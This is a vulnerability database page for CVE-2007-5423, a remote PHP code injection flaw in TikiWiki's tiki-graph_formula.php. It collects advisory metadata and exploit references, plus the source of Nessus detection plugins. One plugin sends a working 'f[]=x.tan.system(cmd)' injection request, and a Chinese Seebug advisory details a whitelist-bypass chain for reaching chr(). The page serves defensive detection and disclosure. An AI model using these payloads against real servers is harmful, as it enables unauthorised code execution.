Vulnerabilities > CVE-2007-5423 - Code Injection vulnerability in Tiki Tikiwiki Cms/Groupware 1.9.8
Attack vector
NETWORK Attack complexity
LOW Privileges required
NONE Confidentiality impact
PARTIAL Integrity impact
PARTIAL Availability impact
PARTIAL Summary
tiki-graph_formula.php in TikiWiki 1.9.8 allows remote attackers to execute arbitrary code via PHP sequences in the f array parameter, which are processed by create_function.
Vulnerable Configurations
| Part | Description | Count |
|---|---|---|
| Application | 1 |
Common Weakness Enumeration (CWE)
Common Attack Pattern Enumeration and Classification (CAPEC)
- Leverage Executable Code in Non-Executable Files An attack of this type exploits a system's trust in configuration and resource files, when the executable loads the resource (such as an image file or configuration file) the attacker has modified the file to either execute malicious code directly or manipulate the target process (e.g. application server) to execute based on the malicious configuration parameters. Since systems are increasingly interrelated mashing up resources from local and remote sources the possibility of this attack occurring is high. The attack can be directed at a client system, such as causing buffer overrun through loading seemingly benign image files, as in Microsoft Security Bulletin MS04-028 where specially crafted JPEG files could cause a buffer overrun once loaded into the browser. Another example targets clients reading pdf files. In this case the attacker simply appends javascript to the end of a legitimate url for a pdf (http://www.gnucitizen.org/blog/danger-danger-danger/) http://path/to/pdf/file.pdf#whatever_name_you_want=javascript:your_code_here The client assumes that they are reading a pdf, but the attacker has modified the resource and loaded executable javascript into the client's browser process. The attack can also target server processes. The attacker edits the resource or configuration file, for example a web.xml file used to configure security permissions for a J2EE app server, adding role name "public" grants all users with the public role the ability to use the administration functionality. The server trusts its configuration file to be correct, but when they are manipulated, the attacker gains full control.
- Manipulating User-Controlled Variables This attack targets user controlled variables (DEBUG=1, PHP Globals, and So Forth). An attacker can override environment variables leveraging user-supplied, untrusted query variables directly used on the application server without any data sanitization. In extreme cases, the attacker can change variables controlling the business logic of the application. For instance, in languages like PHP, a number of poorly set default configurations may allow the user to override variables.
Exploit-Db
description TikiWiki tiki-graph_formula Remote PHP Code Execution. CVE-2007-5423. Webapps exploit for php platform id EDB-ID:16911 last seen 2016-02-02 modified 2010-09-20 published 2010-09-20 reporter metasploit source https://www.exploit-db.com/download/16911/ title TikiWiki tiki-graph_formula Remote PHP Code Execution description TikiWiki 1.9.8 Remote PHP Injection Vulnerability. CVE-2007-5423. Webapps exploit for php platform file exploits/php/webapps/4509.txt id EDB-ID:4509 last seen 2016-01-31 modified 2007-10-10 platform php port published 2007-10-10 reporter ShAnKaR source https://www.exploit-db.com/download/4509/ title TikiWiki 1.9.8 - Remote PHP Injection Vulnerability type webapps
Metasploit
| description | TikiWiki (<= 1.9.8) contains a flaw that may allow a remote attacker to execute arbitrary PHP code. The issue is due to 'tiki-graph_formula.php' script not properly sanitizing user input supplied to create_function(), which may allow a remote attacker to execute arbitrary PHP code resulting in a loss of integrity. |
| id | MSF:EXPLOIT/UNIX/WEBAPP/TIKIWIKI_GRAPH_FORMULA_EXEC |
| last seen | 2020-03-10 |
| modified | 2017-07-24 |
| published | 2009-07-21 |
| references | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5423 |
| reporter | Rapid7 |
| source | https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/unix/webapp/tikiwiki_graph_formula_exec.rb |
| title | TikiWiki tiki-graph_formula Remote PHP Code Execution |
Nessus
NASL family Gentoo Local Security Checks NASL id GENTOO_GLSA-200710-21.NASL description The remote host is affected by the vulnerability described in GLSA-200710-21 (TikiWiki: Arbitrary command execution) ShAnKaR reported that input passed to the last seen 2020-06-01 modified 2020-06-02 plugin id 27553 published 2007-10-25 reporter This script is Copyright (C) 2007-2019 Tenable Network Security, Inc. source https://www.tenable.com/plugins/nessus/27553 title GLSA-200710-21 : TikiWiki: Arbitrary command execution code #%NASL_MIN_LEVEL 80502 # # (C) Tenable Network Security, Inc. # # The descriptive text and package checks in this plugin were # extracted from Gentoo Linux Security Advisory GLSA 200710-21. # # The advisory text is Copyright (C) 2001-2015 Gentoo Foundation, Inc. # and licensed under the Creative Commons - Attribution / Share Alike # license. See http://creativecommons.org/licenses/by-sa/3.0/ # include("compat.inc"); if (description) { script_id(27553); script_version("1.15"); script_cvs_date("Date: 2019/08/02 13:32:44"); script_cve_id("CVE-2007-5423"); script_xref(name:"GLSA", value:"200710-21"); script_name(english:"GLSA-200710-21 : TikiWiki: Arbitrary command execution"); script_summary(english:"Checks for updated package(s) in /var/db/pkg"); script_set_attribute( attribute:"synopsis", value: "The remote Gentoo host is missing one or more security-related patches." ); script_set_attribute( attribute:"description", value: "The remote host is affected by the vulnerability described in GLSA-200710-21 (TikiWiki: Arbitrary command execution) ShAnKaR reported that input passed to the 'f' array parameter in tiki-graph_formula.php is not properly verified before being used to execute PHP functions. Impact : An attacker could execute arbitrary code with the rights of the user running the web server by passing a specially crafted parameter string to the tiki-graph_formula.php file. Workaround : There is no known workaround at this time." ); script_set_attribute( attribute:"see_also", value:"https://security.gentoo.org/glsa/200710-21" ); script_set_attribute( attribute:"solution", value: "All TikiWiki users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose '>=www-apps/tikiwiki-1.9.8.1'" ); script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P"); script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available"); script_set_attribute(attribute:"exploit_available", value:"true"); script_set_attribute(attribute:"exploit_framework_core", value:"true"); script_set_attribute(attribute:"metasploit_name", value:'TikiWiki tiki-graph_formula Remote PHP Code Execution'); script_set_attribute(attribute:"exploit_framework_metasploit", value:"true"); script_set_attribute(attribute:"exploit_framework_canvas", value:"true"); script_set_attribute(attribute:"canvas_package", value:'CANVAS'); script_cwe_id(94); script_set_attribute(attribute:"plugin_type", value:"local"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:gentoo:linux:tikiwiki"); script_set_attribute(attribute:"cpe", value:"cpe:/o:gentoo:linux"); script_set_attribute(attribute:"patch_publication_date", value:"2007/10/20"); script_set_attribute(attribute:"plugin_publication_date", value:"2007/10/25"); script_end_attributes(); script_category(ACT_GATHER_INFO); script_copyright(english:"This script is Copyright (C) 2007-2019 Tenable Network Security, Inc."); script_family(english:"Gentoo Local Security Checks"); script_dependencies("ssh_get_info.nasl"); script_require_keys("Host/local_checks_enabled", "Host/Gentoo/release", "Host/Gentoo/qpkg-list"); exit(0); } include("audit.inc"); include("global_settings.inc"); include("qpkg.inc"); if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED); if (!get_kb_item("Host/Gentoo/release")) audit(AUDIT_OS_NOT, "Gentoo"); if (!get_kb_item("Host/Gentoo/qpkg-list")) audit(AUDIT_PACKAGE_LIST_MISSING); flag = 0; if (qpkg_check(package:"www-apps/tikiwiki", unaffected:make_list("ge 1.9.8.1"), vulnerable:make_list("lt 1.9.8.1"))) flag++; if (flag) { if (report_verbosity > 0) security_hole(port:0, extra:qpkg_report_get()); else security_hole(0); exit(0); } else { tested = qpkg_tests_get(); if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested); else audit(AUDIT_PACKAGE_NOT_INSTALLED, "TikiWiki"); }NASL family Gentoo Local Security Checks NASL id GENTOO_GLSA-200711-19.NASL description The remote host is affected by the vulnerability described in GLSA-200711-19 (TikiWiki: Multiple vulnerabilities) Stefan Esser reported that a previous vulnerability (CVE-2007-5423, GLSA 200710-21) was not properly fixed in TikiWiki 1.9.8.1 (CVE-2007-5682). The TikiWiki development team also added several checks to avoid file inclusion. Impact : A remote attacker could exploit these vulnerabilities to inject arbitrary code with the privileges of the user running the application. Workaround : There is no known workaround at this time. last seen 2020-06-01 modified 2020-06-02 plugin id 28219 published 2007-11-15 reporter This script is Copyright (C) 2007-2019 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/28219 title GLSA-200711-19 : TikiWiki: Multiple vulnerabilities code #%NASL_MIN_LEVEL 80502 # # (C) Tenable Network Security, Inc. # # The descriptive text and package checks in this plugin were # extracted from Gentoo Linux Security Advisory GLSA 200711-19. # # The advisory text is Copyright (C) 2001-2018 Gentoo Foundation, Inc. # and licensed under the Creative Commons - Attribution / Share Alike # license. See http://creativecommons.org/licenses/by-sa/3.0/ # include("compat.inc"); if (description) { script_id(28219); script_version("1.17"); script_cvs_date("Date: 2019/08/02 13:32:44"); script_cve_id("CVE-2007-5423", "CVE-2007-5682"); script_xref(name:"GLSA", value:"200711-19"); script_name(english:"GLSA-200711-19 : TikiWiki: Multiple vulnerabilities"); script_summary(english:"Checks for updated package(s) in /var/db/pkg"); script_set_attribute( attribute:"synopsis", value: "The remote Gentoo host is missing one or more security-related patches." ); script_set_attribute( attribute:"description", value: "The remote host is affected by the vulnerability described in GLSA-200711-19 (TikiWiki: Multiple vulnerabilities) Stefan Esser reported that a previous vulnerability (CVE-2007-5423, GLSA 200710-21) was not properly fixed in TikiWiki 1.9.8.1 (CVE-2007-5682). The TikiWiki development team also added several checks to avoid file inclusion. Impact : A remote attacker could exploit these vulnerabilities to inject arbitrary code with the privileges of the user running the application. Workaround : There is no known workaround at this time." ); script_set_attribute( attribute:"see_also", value:"https://security.gentoo.org/glsa/200710-21" ); script_set_attribute( attribute:"see_also", value:"https://security.gentoo.org/glsa/200711-19" ); script_set_attribute( attribute:"solution", value: "All TikiWiki users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose '>=www-apps/tikiwiki-1.9.8.3'" ); script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P"); script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available"); script_set_attribute(attribute:"exploit_available", value:"true"); script_set_attribute(attribute:"exploit_framework_core", value:"true"); script_set_attribute(attribute:"metasploit_name", value:'TikiWiki tiki-graph_formula Remote PHP Code Execution'); script_set_attribute(attribute:"exploit_framework_metasploit", value:"true"); script_set_attribute(attribute:"exploit_framework_canvas", value:"true"); script_set_attribute(attribute:"canvas_package", value:'CANVAS'); script_cwe_id(94, 264); script_set_attribute(attribute:"plugin_type", value:"local"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:gentoo:linux:tikiwiki"); script_set_attribute(attribute:"cpe", value:"cpe:/o:gentoo:linux"); script_set_attribute(attribute:"patch_publication_date", value:"2007/11/14"); script_set_attribute(attribute:"plugin_publication_date", value:"2007/11/15"); script_end_attributes(); script_category(ACT_GATHER_INFO); script_copyright(english:"This script is Copyright (C) 2007-2019 and is owned by Tenable, Inc. or an Affiliate thereof."); script_family(english:"Gentoo Local Security Checks"); script_dependencies("ssh_get_info.nasl"); script_require_keys("Host/local_checks_enabled", "Host/Gentoo/release", "Host/Gentoo/qpkg-list"); exit(0); } include("audit.inc"); include("global_settings.inc"); include("qpkg.inc"); if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED); if (!get_kb_item("Host/Gentoo/release")) audit(AUDIT_OS_NOT, "Gentoo"); if (!get_kb_item("Host/Gentoo/qpkg-list")) audit(AUDIT_PACKAGE_LIST_MISSING); flag = 0; if (qpkg_check(package:"www-apps/tikiwiki", unaffected:make_list("ge 1.9.8.3"), vulnerable:make_list("lt 1.9.8.3"))) flag++; if (flag) { if (report_verbosity > 0) security_hole(port:0, extra:qpkg_report_get()); else security_hole(0); exit(0); } else { tested = qpkg_tests_get(); if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested); else audit(AUDIT_PACKAGE_NOT_INSTALLED, "TikiWiki"); }NASL family CGI abuses NASL id TIKIWIKI_F_CMD_EXEC.NASL description The remote host is running TikiWiki, an open source wiki application written in PHP. The version of TikiWiki on the remote host fails to sanitize input to the last seen 2020-06-01 modified 2020-06-02 plugin id 26968 published 2007-10-11 reporter This script is Copyright (C) 2007-2018 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/26968 title TikiWiki tiki-graph_formula.php f Parameter Arbitrary Command Execution code # # (C) Tenable Network Security, Inc. # include("compat.inc"); if (description) { script_id(26968); script_version("1.24"); script_cvs_date("Date: 2018/11/15 20:50:19"); script_cve_id("CVE-2007-5423"); script_bugtraq_id(26006); script_name(english:"TikiWiki tiki-graph_formula.php f Parameter Arbitrary Command Execution"); script_summary(english:"Tries to run a command via TikiWiki's tiki-graph_formula.php"); script_set_attribute(attribute:"synopsis", value: "The remote web server contains a PHP script that allows arbitrary command execution." ); script_set_attribute(attribute:"description", value: "The remote host is running TikiWiki, an open source wiki application written in PHP. The version of TikiWiki on the remote host fails to sanitize input to the 'f[]' parameter of the 'tiki-graph_formula.php' script before using it as a function call. Regardless of PHP's 'register_globals' setting, an unauthenticated attacker can leverage this issue to execute arbitrary code on the remote host subject to the privileges of the web server user id." ); script_set_attribute(attribute:"see_also", value:"https://www.securityfocus.com/archive/1/482006/30/0/threaded"); script_set_attribute(attribute:"see_also", value:"https://tiki.org/tiki-read_article.php?articleId=14" ); script_set_attribute(attribute:"solution", value:"Upgrade to TikiWiki version 1.9.8.1 or later."); script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P"); script_set_cvss_temporal_vector("CVSS2#E:F/RL:OF/RC:C"); script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"); script_set_cvss3_temporal_vector("CVSS:3.0/E:F/RL:O/RC:C"); script_set_attribute(attribute:"exploitability_ease", value:"No exploit is required"); script_set_attribute(attribute:"exploit_available", value:"false"); script_set_attribute(attribute:"exploit_framework_core", value:"true"); script_set_attribute(attribute:"metasploit_name", value:'TikiWiki tiki-graph_formula Remote PHP Code Execution'); script_set_attribute(attribute:"exploit_framework_metasploit", value:"true"); script_set_attribute(attribute:"exploit_framework_canvas", value:"true"); script_set_attribute(attribute:"canvas_package", value:'CANVAS'); script_cwe_id(94); script_set_attribute(attribute:"plugin_publication_date", value:"2007/10/11"); script_set_attribute(attribute:"plugin_type", value:"remote"); script_set_attribute(attribute:"cpe", value:"cpe:/a:tikiwiki:tikiwiki"); script_set_attribute(attribute:"exploited_by_nessus", value:"true"); script_end_attributes(); script_category(ACT_ATTACK); script_family(english:"CGI abuses"); script_copyright(english:"This script is Copyright (C) 2007-2018 and is owned by Tenable, Inc. or an Affiliate thereof."); script_dependencies("tikiwiki_detect.nasl"); script_exclude_keys("Settings/disable_cgi_scanning"); script_require_ports("Services/www", 80); script_require_keys("www/PHP","www/tikiwiki"); exit(0); } include("audit.inc"); include("global_settings.inc"); include("misc_func.inc"); include("http.inc"); include("webapp_func.inc"); include("data_protection.inc"); port = get_http_port(default:80,php:TRUE); install = get_install_from_kb(appname:'tikiwiki', port:port, exit_on_fail:TRUE); dir = install['dir']; # Try to exploit the issue to run a command. cmd = "id"; if (thorough_tests) ts = make_list("pdf", "png"); else ts = make_list("pdf"); foreach t (ts) { w = http_send_recv3(method:"GET", item:string( dir , "/tiki-graph_formula.php?", "w=1&", "h=1&", "s=1&", "min=1&", "max=2&", "f[]=x.tan.system(", cmd, ")&", "t=", t, "&", "title=" ), port:port ); if (isnull(w)) exit(1, "the web server did not answer"); res = w[2]; line = egrep(pattern:"uid=[0-9]+.*gid=[0-9]+.*", string:res); if (line) { report = string( "\n", "It was possible to execute the command '", cmd, "' on the remote host,\n", "which produces the following output :\n", "\n", " ", data_protection::sanitize_uid(output:line) ); security_hole(port:port, extra:report); exit(0); } }
Packetstorm
| data source | https://packetstormsecurity.com/files/download/82370/tikiwiki_graph_formula_exec.rb.txt |
| id | PACKETSTORM:82370 |
| last seen | 2016-12-05 |
| published | 2009-10-30 |
| reporter | Matteo Cantoni |
| source | https://packetstormsecurity.com/files/82370/TikiWiki-tiki-graph_formula-Remote-Command-Execution.html |
| title | TikiWiki tiki-graph_formula Remote Command Execution |
Seebug
| bulletinFamily | exploit |
| description | TikiWiki是一款基于PHP、ADOdb以及smarty开发的内容管理系统/门户系统/群件系统。 TikiWiki包含的tiki-graph_formula.php不正确过滤用户提交的参数,远程攻击者可以利用漏洞注入恶意PHP代码并以WEB权限执行。 TikiWiki的tiki-graph_formula.php脚本使用PHP的create_function()创建匿名函数来动态计算由用户通过'f' URL参数提供的数学函数。 为了保护针对任意PHP代码的执行,TikiWiki开发者组合黑名单和白名单。一方面他们对三个字符进行黑名单过滤,另一方面用户提供的输入中只允许部分数字字符串。 三个黑名单列表字符为: ` - 允许SHELL命令执行Allows execution of shell commands ' - 字符串分隔符 " - 字符串分隔符 允许的数字字符串白名单只允许在部分数学函数中使用如:sin, cos, tan, pow, ... 当ShAnKaR审核TikiWiki时白名单列表检查不正确实现,可导致执行PHP函数。这个漏洞已经在CVE-2007-5423公布并在TikiWiki 1.9.8.1 update中得到修补。 但是由于PHP支持变量函数和可变变量,修补的白名单列表没有保护任意PHP代码执行: $varname = 'othervar'; $$varname = 4; // set $othervar to 4 $funcname = 'chr'; $funcname(95); // call chr(95) 因为TikiWiki的黑名单不保护'$'字符,注入PHP表达式可使用临时变量如$sin, $cos, $tan, ... 因此很显然通过填充字符串代表命名的其他函数的临时变量可绕过保护。 虽然由于所有允许的函数只返回数字,看起来从临时变量中获得字符串比较困难,但是还有两个PHP功能可帮助解决这个问题:数组到字符串转换及处理未明常数: $sin=cosh; // cosh is an unknown constant. // PHP assumes the string 'cosh' as value $sin[]=pi(); // Creates an array $sin=$sin.$sin; // Stringconcats of arrays. Array to string // conversion. Becomes 'ArrayArray' 使用这些方法组合使用++操作符也允许增加数字字符串,可能如下调用chr()函数: $tan=pi()-pi(); // Get 0 into $tan $sin=cosh; // Get the string 'cosh' into $sin $min=$sin[$tan]; // Get 'c' into $min $tan++; // Get 1 into $tan $min.=$sin[$tan+$tan+$tan] // Append 'h' to 'c' $min.=$sin[$tan]; // Append 'o' to 'ch' $min++; // Increment 'cho' to 'chp' $min++; // Increment 'chp' to 'chq' $min++; // Increment 'chq' to 'chr' $min($tan) // Call chr(1) 通过访问chr()函数可能建立任意字符串并调用任何其他函数,导致任意PHP代码执行。 TikiWiki Project TikiWiki 1.9.8 1 TikiWiki Project TikiWiki 1.9.8 TikiWiki Project TikiWiki 1.9.7 TikiWiki Project TikiWiki 1.9.6 TikiWiki Project TikiWiki 1.9.5 TikiWiki Project TikiWiki 1.9.4 TikiWiki Project TikiWiki 1.9.3 2 TikiWiki Project TikiWiki 1.9.3 1 TikiWiki Project TikiWiki 1.9.2 TikiWiki Project TikiWiki 1.9.1 .1 TikiWiki Project TikiWiki 1.9.1 TikiWiki Project TikiWiki 1.9 -rc3.1 TikiWiki Project TikiWiki 1.9 -rc3 TikiWiki Project TikiWiki 1.9 -rc2 TikiWiki Project TikiWiki 1.9 -rc1 升级程序: TikiWiki Project TikiWiki 1.9 -rc2 TikiWiki Project tikiwiki-1.9.8.2.tar.gz <a href="http://downloads.sourceforge.net/tikiwiki/tikiwiki-1.9.8.2.tar.gz?modt" target="_blank">http://downloads.sourceforge.net/tikiwiki/tikiwiki-1.9.8.2.tar.gz?modt</a> ime=1193347915&big_mirror=1 TikiWiki Project TikiWiki 1.9 -rc1 TikiWiki Project tikiwiki-1.9.8.2.tar.gz <a href="http://downloads.sourceforge.net/tikiwiki/tikiwiki-1.9.8.2.tar.gz?modt" target="_blank">http://downloads.sourceforge.net/tikiwiki/tikiwiki-1.9.8.2.tar.gz?modt</a> ime=1193347915&big_mirror=1 TikiWiki Project TikiWiki 1.9 -rc3 TikiWiki Project tikiwiki-1.9.8.2.tar.gz <a href="http://downloads.sourceforge.net/tikiwiki/tikiwiki-1.9.8.2.tar.gz?modt" target="_blank">http://downloads.sourceforge.net/tikiwiki/tikiwiki-1.9.8.2.tar.gz?modt</a> ime=1193347915&big_mirror=1 TikiWiki Project TikiWiki 1.9 -rc3.1 TikiWiki Project tikiwiki-1.9.8.2.tar.gz <a href="http://downloads.sourceforge.net/tikiwiki/tikiwiki-1.9.8.2.tar.gz?modt" target="_blank">http://downloads.sourceforge.net/tikiwiki/tikiwiki-1.9.8.2.tar.gz?modt</a> ime=1193347915&big_mirror=1 TikiWiki Project TikiWiki 1.9.1 TikiWiki Project tikiwiki-1.9.8.2.tar.gz <a href="http://downloads.sourceforge.net/tikiwiki/tikiwiki-1.9.8.2.tar.gz?modt" target="_blank">http://downloads.sourceforge.net/tikiwiki/tikiwiki-1.9.8.2.tar.gz?modt</a> ime=1193347915&big_mirror=1 TikiWiki Project TikiWiki 1.9.1 .1 TikiWiki Project tikiwiki-1.9.8.2.tar.gz <a href="http://downloads.sourceforge.net/tikiwiki/tikiwiki-1.9.8.2.tar.gz?modt" target="_blank">http://downloads.sourceforge.net/tikiwiki/tikiwiki-1.9.8.2.tar.gz?modt</a> ime=1193347915&big_mirror=1 TikiWiki Project TikiWiki 1.9.2 TikiWiki Project tikiwiki-1.9.8.2.tar.gz <a href="http://downloads.sourceforge.net/tikiwiki/tikiwiki-1.9.8.2.tar.gz?modt" target="_blank">http://downloads.sourceforge.net/tikiwiki/tikiwiki-1.9.8.2.tar.gz?modt</a> ime=1193347915&big_mirror=1 TikiWiki Project TikiWiki 1.9.3 2 TikiWiki Project tikiwiki-1.9.8.2.tar.gz <a href="http://downloads.sourceforge.net/tikiwiki/tikiwiki-1.9.8.2.tar.gz?modt" target="_blank">http://downloads.sourceforge.net/tikiwiki/tikiwiki-1.9.8.2.tar.gz?modt</a> ime=1193347915&big_mirror=1 TikiWiki Project TikiWiki 1.9.3 1 TikiWiki Project tikiwiki-1.9.8.2.tar.gz <a href="http://downloads.sourceforge.net/tikiwiki/tikiwiki-1.9.8.2.tar.gz?modt" target="_blank">http://downloads.sourceforge.net/tikiwiki/tikiwiki-1.9.8.2.tar.gz?modt</a> ime=1193347915&big_mirror=1 TikiWiki Project TikiWiki 1.9.4 TikiWiki Project tikiwiki-1.9.8.2.tar.gz <a href="http://downloads.sourceforge.net/tikiwiki/tikiwiki-1.9.8.2.tar.gz?modt" target="_blank">http://downloads.sourceforge.net/tikiwiki/tikiwiki-1.9.8.2.tar.gz?modt</a> ime=1193347915&big_mirror=1 TikiWiki Project TikiWiki 1.9.5 TikiWiki Project tikiwiki-1.9.8.2.tar.gz <a href="http://downloads.sourceforge.net/tikiwiki/tikiwiki-1.9.8.2.tar.gz?modt" target="_blank">http://downloads.sourceforge.net/tikiwiki/tikiwiki-1.9.8.2.tar.gz?modt</a> ime=1193347915&big_mirror=1 TikiWiki Project TikiWiki 1.9.6 TikiWiki Project tikiwiki-1.9.8.2.tar.gz <a href="http://downloads.sourceforge.net/tikiwiki/tikiwiki-1.9.8.2.tar.gz?modt" target="_blank">http://downloads.sourceforge.net/tikiwiki/tikiwiki-1.9.8.2.tar.gz?modt</a> ime=1193347915&big_mirror=1 TikiWiki Project TikiWiki 1.9.7 TikiWiki Project tikiwiki-1.9.8.2.tar.gz <a href="http://downloads.sourceforge.net/tikiwiki/tikiwiki-1.9.8.2.tar.gz?modt" target="_blank">http://downloads.sourceforge.net/tikiwiki/tikiwiki-1.9.8.2.tar.gz?modt</a> ime=1193347915&big_mirror=1 TikiWiki Project TikiWiki 1.9.8 1 TikiWiki Project tikiwiki-1.9.8.2.tar.gz <a href="http://downloads.sourceforge.net/tikiwiki/tikiwiki-1.9.8.2.tar.gz?modt" target="_blank">http://downloads.sourceforge.net/tikiwiki/tikiwiki-1.9.8.2.tar.gz?modt</a> ime=1193347915&big_mirror=1 TikiWiki Project TikiWiki 1.9.8 TikiWiki Project tikiwiki-1.9.8.2.tar.gz <a href="http://downloads.sourceforge.net/tikiwiki/tikiwiki-1.9.8.2.tar.gz?modt" target="_blank">http://downloads.sourceforge.net/tikiwiki/tikiwiki-1.9.8.2.tar.gz?modt</a> ime=1193347915&big_mirror=1 |
| id | SSV:2363 |
| last seen | 2017-11-19 |
| modified | 2007-10-31 |
| published | 2007-10-31 |
| reporter | Root |
| title | TikiWiki Tiki-Graph_Formula.PHP白名单检查代码注入漏洞 |
References
- http://bugs.gentoo.org/show_bug.cgi?id=195503
- http://osvdb.org/40478
- http://secunia.com/advisories/27190
- http://secunia.com/advisories/27344
- http://securityreason.com/securityalert/3216
- http://securityvulns.ru/Sdocument162.html
- http://sourceforge.net/forum/forum.php?forum_id=744898
- http://sourceforge.net/project/shownotes.php?release_id=546283&group_id=64258
- http://www.gentoo.org/security/en/glsa/glsa-200710-21.xml
- http://www.securityfocus.com/archive/1/482006/100/0/threaded
- http://www.securityfocus.com/archive/1/482128/100/0/threaded
- http://www.securityfocus.com/bid/26006
- http://www.vupen.com/english/advisories/2007/3492
- https://exchange.xforce.ibmcloud.com/vulnerabilities/37076
- https://www.exploit-db.com/exploits/4509